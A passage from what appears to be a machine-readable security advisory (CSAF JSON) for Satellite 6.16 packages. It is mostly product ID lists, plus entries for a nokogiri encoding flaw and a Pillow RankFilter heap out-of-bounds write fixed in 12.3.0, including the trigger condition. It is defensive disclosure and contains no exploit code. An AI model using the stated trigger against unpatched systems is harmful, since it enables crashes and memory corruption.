"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "nokogiri: Nokogiri: Denial of Service or Information Disclosure via invalid encoding handling"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
